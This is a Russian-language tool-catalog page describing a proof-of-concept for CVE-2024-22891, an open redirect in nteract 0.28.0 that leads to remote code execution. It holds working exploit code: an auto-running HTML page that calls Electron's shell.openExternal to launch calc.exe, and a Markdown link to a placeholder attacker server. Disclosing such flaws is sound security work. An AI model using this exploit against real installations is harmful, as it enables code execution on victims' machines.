Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-22891 — Эксплойт open redirect к RCE в nteract 0.28.0 | Kitploit
Инструменты/GitHubGitHub/eqstlab/cve-2024-22891
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubeqstlab/cve-2024-22891

CVE-2024-22891

Эксплойт open redirect к RCE в nteract 0.28.0

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Nteract PoC

Proof-of-Concept для уязвимости CVE-2024-22891.

nteract 0.28.0 позволяет использовать Electron webview через ссылку Markdown, что приводит к удалённому выполнению кода.

В этом репозитории представлены пример уязвимого приложения и эксплойт proof-of-concept (POC) для него. В качестве PoC представлен python-файл, автоматизирующий этот процесс.

1. Обзор уязвимости:

  • Тема уязвимости: RCE через ссылку Markdown
  • Тип уязвимости: Другое: Open Redirect
  • Проявление проблемы: Electron Webview
  • Затронутый компонент: markdown
  • Тип атаки: Удалённое выполнение кода
  • Векторы атаки: Чтобы использовать уязвимость, кто-то должен перейти по ссылке или открыть ссылку общего доступа к проекту.
  • Зарезервированный номер CVE: CVE-2024-22891

2. Причина уязвимости:

  • nteract 0.28.0 позволяет использовать Electron webview через ссылку Markdown, что приводит к удалённому выполнению кода (поскольку nodeIntegration в webPreferences имеет значение true).

  • Объяснение эксплойта

    • При генерации ссылок через Markdown внутри приложения оно создаёт WebView через Electron, обеспечивая внешний доступ к ссылке. Следовательно, атакующий может добиться удалённого выполнения кода (RCE), подключившись к ссылке, ведущей на сервер атакующего.

Proof-of-concept (POC)

Шаг 1) Атакующий создаёт сервер с исходным кодом для запуска calc.exe с помощью функции openExternal().

root@kitploit:~
<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
         // Script function definition
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>

Примечание: ※ Если вы хотите быстро протестировать это, создайте сервер на ПК атакующего с помощью следующего кода.

root@kitploit:~
$ python -m http.server 80

Шаг 2) Запустите приложение nteract в системе жертвы и создайте ссылку Markdown либо передайте ipynb-файл атакующего в качестве примера кода. Затем запускается calc.exe.

root@kitploit:~
[Read This] (http://[attcker_adress]/shard_data.html)

neteract nteract2


3. Дополнительная информация

При выполнении .ipynb-файла через общий доступ к файлам будьте осторожны: ссылка может быть не видна. Этот calc.exe мог бы быть любой вредоносной нагрузкой — локальной или удалённой, — которая предоставила бы атакующему полный доступ к системе жертвы.

Скачать инструмент